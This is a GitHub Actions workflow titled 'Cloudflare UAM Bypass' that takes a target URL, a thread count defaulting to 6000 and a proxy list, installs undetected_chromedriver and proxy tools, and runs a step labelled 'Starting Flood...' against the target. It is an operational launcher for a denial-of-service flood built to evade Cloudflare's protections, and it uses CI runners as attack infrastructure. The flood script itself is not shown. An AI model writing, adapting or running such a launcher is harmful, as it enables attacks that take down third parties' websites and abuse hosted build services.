name: Cloudflare UAM Bypass

on:
  workflow_dispatch:
    inputs:
      iptgt:
        description: "URL Target: "
        required: true
        default: "https://"
      thr:
        description: "Thread: "
        required: true
        default: "6000"
      proxyfile:
        description: "Proxy File: "
        required: true
        default: "http.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.10
      uses: actions/setup-python@v3
      with:
        python-version: "3.10"
    - name: Install dependencies
      run: |
        chmod 777 installChrome.sh
        ./installChrome.sh
        python -m pip install --upgrade pip
        pip install selenium requests pysocks socks colored undetected_chromedriver
        if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
    - name: Starting Flood...
      run: |
        chmod 777 fetch-proxy.py
        chmod 777 main.py
        python3 fetch-proxy.py ${{ github.event.inputs.proxyfile }}
        python3 main.py ${{ github.event.inputs.iptgt }} ${{ github.event.inputs.thr }} ${{ github.event.inputs.proxyfile }}
